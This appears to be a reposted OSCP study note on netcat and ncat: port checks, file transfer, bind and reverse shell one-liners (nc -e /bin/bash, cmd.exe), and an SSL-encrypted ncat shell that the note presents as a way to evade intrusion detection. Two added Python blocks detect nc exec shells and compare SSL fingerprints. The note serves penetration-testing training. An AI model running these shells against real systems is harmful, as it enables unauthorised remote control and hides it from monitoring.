OSCP Note - Common use of Netcat(nc) and Ncat

admin, 2024-08-14 14:40:18

0x00 TL;DR

This note records common ways to use nc.

  • Determine if the target port is open
  • Connecting to a TCP/UDP Port
  • Listening on a TCP/UDP Port
  • Transferring Files with Netcat
  • Remote Administration with Netcat
  • Ncat: a more secure nc

0x01 Determine if the target port is open

  • Port open

    [ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 22
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 10.0.0.64:22.
    Ncat: 0 bytes sent, 0 bytes received in 0.53 seconds.

  • Port closed

    [ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 23
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connection refused.
    [ec2-user@ip-10-0-0-64 ~]$

0x02 Connecting to a TCP/UDP Port

Useful:

  • Check whether a port is open or closed
  • Read a service banner
  • Connect to a network service manually

Example:

    [ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 22
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 10.0.0.64:22.
    SSH-2.0-OpenSSH_7.4
    Protocol mismatch.
    Ncat: Broken pipe.
    [ec2-user@ip-10-0-0-64 ~]$

0x03 Listening on a TCP/UDP Port

Useful:

  • Debugging client applications over the network
  • Receiving any other TCP/UDP connection

Server side, listening on TCP port 4444:

    [ec2-user@ip-10-0-0-64 ~]$ nc -nvlp 4444
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444

With netstat you can see that TCP port 4444 is listening:

    [ec2-user@ip-10-0-0-64 ~]$ sudo netstat -nltp | grep 4444
    tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      7427/nc
    tcp6       0      0 :::4444                 :::*                    LISTEN      7427/nc
    [ec2-user@ip-10-0-0-64 ~]$

The client side can connect to this TCP port and chat with the server side:

    [ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 4444
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 10.0.0.64:4444.
    aaaaaaaaaaaaaaaaaaaaa

0x04 Transferring Files with Netcat

Note the Windows Firewall configuration. Both text and binary files are supported.

Server side (target machine):

    D:\netcat-win32-1.12>nc64.exe -nlvp 4444 > wget.exe
    listening on [any] 4444 ...
    connect to [10.0.0.39] from (UNKNOWN) [52.80.67.xxx] 59980

Client side:

    [ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 < wget.exe
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 54.222.196.xxx:4444.
    Ncat: 308736 bytes sent, 0 bytes received in 0.62 seconds.

0x05 Remote Administration with Netcat

Netcat can take an executable file and redirect its input (stdin), output (stdout), and error messages (stderr) to a TCP/UDP port rather than the default console.

nc Bind Shell

Server side (Windows):

    D:\netcat-win32-1.12>nc -nlvp 4444 -e cmd.exe
    listening on [any] 4444 ...
    connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 60420

On Linux, the equivalent bind shell command is:

    nc -nlvp 4444 -e /bin/bash

Client side:

    [ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 54.222.196.xxx:4444.
    Microsoft Windows [版本 10.0.14393]
    (c) 2016 Microsoft Corporation。保留所有权利。

    D:\netcat-win32-1.12>whoami
    whoami
    ec2amaz-okar8bt\administrator

    D:\netcat-win32-1.12>

nc Reverse Shell

Server side:

    D:\netcat-win32-1.12>nc -nlvp 4444
    listening on [any] 4444 ...

Client side:

    [ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 -e /bin/bash
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Connected to 54.222.196.xxx:4444.

Then you can execute commands in this reverse shell, like this:

    D:\netcat-win32-1.12>nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 40908
    id
    uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)
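From the defender's side, the netstat output in 0x03 and the `-e` bind/reverse shells above leave a recognisable trace: an nc-family process started with an exec option, optionally owning a listening socket. The following is an added example (not from the original note) that parses constructed `netstat -nltp` and `ps -eo pid,args` text in that format and reports such processes; the sample lines and the 203.0.113.5 address are constructed.

```python
"""Spot nc/ncat processes that hand a shell to a network peer.

Added example, not from the original note: it parses `netstat -nltp` text (the
format shown in 0x03) and `ps -eo pid,args` text, flags nc-family processes
started with an exec option (bind or reverse shell) and joins listening sockets
to their command line by PID. Both samples below are constructed.
"""
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      7427/nc
tcp6       0      0 :::4444                 :::*                    LISTEN      7427/nc
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
"""
PS_SAMPLE = """\
  PID COMMAND
  812 /usr/sbin/sshd -D
 7427 nc -nlvp 4444 -e /bin/bash
 9002 nc -nv 203.0.113.5 4444 -e /bin/bash
 9003 nc -nv 203.0.113.5 4444
"""
NC_NAMES = {"nc", "ncat", "netcat", "nc64.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec", "--lua-exec"}

def parse_ps(ps_text):
    """Map PID -> command line from `ps -eo pid,args` output (header skipped)."""
    procs = {}
    for line in ps_text.splitlines()[1:]:
        pid, _, args = line.strip().partition(" ")
        if pid.isdigit():
            procs[int(pid)] = args.strip()
    return procs

def nc_exec_pids(ps_text):
    """PIDs of nc-family processes started with an exec option, in either direction."""
    hits = []
    for pid, cmd in parse_ps(ps_text).items():
        argv = cmd.split()
        if argv and argv[0].rsplit("/", 1)[-1] in NC_NAMES and EXEC_FLAGS & set(argv):
            hits.append(pid)
    return sorted(hits)

def shell_listeners(netstat_text, ps_text):
    """(proto, port, pid, cmdline) for listening TCP sockets owned by a flagged PID."""
    flagged, procs, found = set(nc_exec_pids(ps_text)), parse_ps(ps_text), []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 7 or not f[0].startswith("tcp"):
            continue                      # header line, unix sockets, non-tcp
        pid_s = f[6].partition("/")[0]    # "-" when netstat ran without privileges
        if pid_s.isdigit() and int(pid_s) in flagged:
            found.append((f[0], int(f[3].rpartition(":")[2]), int(pid_s), procs[int(pid_s)]))
    return found
```

The reverse shell (PID 9002) has no listening socket and is caught by nc_exec_pids alone; the bind shell (PID 7427) shows up in both.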

0x06 Ncat: a more secure nc

  • Encrypting the bind or reverse shell helps the penetration tester avoid intrusion detection systems.
  • It does not expose the compromised machine to unwanted IP addresses.

Server side:

    [ec2-user@ip-10-0-0-64 temp]$ ncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --ssl
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from 54.222.196.xxx.
    Ncat: Connection from 54.222.196.xxx:63540.

Client side:

    D:\NcatPortable-master\NcatPortable-master>ncat -v 52.80.67.xxx 4444 --ssl
    Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
    Ncat: SSL connection to 52.80.67.xxx:4444.
    Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3
    id
    uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)

Then you can execute commands in this bind shell.
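Ncat's --ssl encrypts the session but does not verify the peer certificate by default, which is why both terminals above print the same SHA-1 fingerprint: comparing that value is the only check available with a temporary key. The block below is an added example (not from the original note) that reproduces Ncat's fingerprint format (SHA-1 over the DER certificate, upper-case hex in groups of four) and compares a copied fingerprint in constant time; PLACEHOLDER_DER is a constructed byte string, not a real certificate.

```python
"""Compare the SHA-1 fingerprint Ncat prints for an --ssl session.

Added example, not from the original note. Ncat --ssl does not verify the peer
certificate by default, so with a temporary key the fingerprint shown on both
ends is the only thing to check. Ncat's value is SHA-1 over the DER certificate,
printed as upper-case hex in groups of four; this reproduces that form and
compares a copied fingerprint in constant time. The DER bytes below are a
constructed placeholder, not a real certificate.
"""
import hashlib
import hmac

PLACEHOLDER_DER = b"\x30\x82\x01\x00" + bytes(range(256))   # constructed, not X.509

def ncat_fingerprint(der_bytes):
    """Return the fingerprint as Ncat displays it, e.g. 'C900 5192 ... 3BF3'."""
    hexdigest = hashlib.sha1(der_bytes).hexdigest().upper()
    return " ".join(hexdigest[i:i + 4] for i in range(0, len(hexdigest), 4))

def normalize(fingerprint):
    """Keep only hex digits so 'C900 5192', 'c9:00:51:92' and 'C9005192' agree."""
    return "".join(ch for ch in fingerprint.upper() if ch in "0123456789ABCDEF")

def fingerprint_matches(der_bytes, expected):
    """True when the certificate's SHA-1 equals the fingerprint read off the other terminal."""
    want = normalize(expected)
    if len(want) != 40:                   # not a full SHA-1: refuse rather than prefix-match
        return False
    return hmac.compare_digest(normalize(ncat_fingerprint(der_bytes)), want)

def fingerprint_of_file(path):
    """Fingerprint a certificate saved in DER form (openssl x509 -outform DER)."""
    with open(path, "rb") as fh:
        return ncat_fingerprint(fh.read())

if __name__ == "__main__":
    print("placeholder cert :", ncat_fingerprint(PLACEHOLDER_DER))
    print("matches note's FP:", fingerprint_matches(
        PLACEHOLDER_DER, "C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3"))
```

With a permanent key pair (--ssl-cert/--ssl-key, as Ncat's own message suggests) the client can instead pin the server certificate with --ssl-verify and --ssl-trustfile rather than comparing fingerprints by eye.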

0x07 Command summary

    nc -vz 10.0.0.64 22
    nc -nv 10.0.0.64 22
    nc -nvlp 4444
    nc64.exe -nlvp 4444 > wget.exe
    nc -nv 54.222.196.xxx 4444 < wget.exe
    nc -nlvp 4444 -e cmd.exe
    nc -nlvp 4444 -e /bin/bash
    nc -nv 54.222.196.xxx 4444 -e /bin/bash
    ncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --ssl
    ncat -v 52.80.67.xxx 4444 --ssl

0x08 Reference

  • Source: tonghuaroot.com

  • Reprinted from CN-SEC (thanks to the original author); original link: OSCP Note - Common use of Netcat(nc) and Ncat http://cn-sec.com/archives/3067258.html
